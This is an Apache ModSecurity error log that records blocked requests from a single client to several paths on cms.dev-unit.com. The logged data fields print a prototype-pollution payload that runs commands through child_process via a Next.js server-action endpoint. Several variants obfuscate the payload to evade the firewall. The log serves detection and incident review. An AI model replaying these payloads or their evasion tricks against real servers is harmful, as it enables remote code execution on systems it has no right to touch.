"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzLxQSOrq_iRTM7dpwQAAAQ4"] [Sun Apr 05 15:42:36.870712 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:43530] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzJc83uMXRUE9zvQS-AAAAdg"] [Sun Apr 05 15:42:36.873156 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:43500] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzLxQSOrq_iRTM7dpwgAAAQM"] [Sun Apr 05 15:42:36.875617 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:43510] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzLxQSOrq_iRTM7dpwwAAAQU"] [Sun Apr 05 15:42:36.877470 2026] [:error] [pid 23077:tid 23091] [client 172.94.9.253:43544] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzJc83uMXRUE9zvQS-QAAAcg"] [Sun Apr 05 15:42:36.877612 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:43524] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/search"] [unique_id "adJmzLxQSOrq_iRTM7dpxAAAARg"] [Sun Apr 05 15:42:36.879224 2026] [:error] [pid 1503:tid 1512] [client 172.94.9.253:43526] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzEI7AjfUQYCN-J7DowAAAMM"] [Sun Apr 05 15:42:36.887293 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:43546] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzLxQSOrq_iRTM7dpxQAAAQs"] [Sun Apr 05 15:42:36.896811 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:43584] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzLxQSOrq_iRTM7dpxgAAAQY"] [Sun Apr 05 15:42:36.899060 2026] [:error] [pid 23077:tid 23084] [client 172.94.9.253:43572] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzJc83uMXRUE9zvQS-gAAAcE"] [Sun Apr 05 15:42:36.911116 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:43558] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzLxQSOrq_iRTM7dpxwAAAQ4"] [Sun Apr 05 15:42:36.989244 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:43644] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzLxQSOrq_iRTM7dpyAAAAQI"] [Sun Apr 05 15:42:36.989959 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:43650] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzJc83uMXRUE9zvQS_AAAAco"] [Sun Apr 05 15:42:36.990645 2026] [:error] [pid 1503:tid 1511] [client 172.94.9.253:43664] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzEI7AjfUQYCN-J7DpAAAAMI"] [Sun Apr 05 15:42:36.991752 2026] [:error] [pid 23077:tid 23103] [client 172.94.9.253:43628] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzJc83uMXRUE9zvQS_QAAAdQ"] [Sun Apr 05 15:42:36.992002 2026] [:error] [pid 1503:tid 1513] [client 172.94.9.253:43594] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzEI7AjfUQYCN-J7DpQAAAMQ"] [Sun Apr 05 15:42:36.992876 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:43590] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJmzJc83uMXRUE9zvQS_wAAAdc"] [Sun Apr 05 15:42:36.992875 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:43604] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzJc83uMXRUE9zvQS_gAAAcY"] [Sun Apr 05 15:42:36.993139 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:43616] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzLxQSOrq_iRTM7dpyQAAARg"] [Sun Apr 05 15:42:36.993155 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:43674] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/shop"] [unique_id "adJmzLxQSOrq_iRTM7dpygAAAQs"] [Sun Apr 05 15:42:36.993459 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:43662] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). 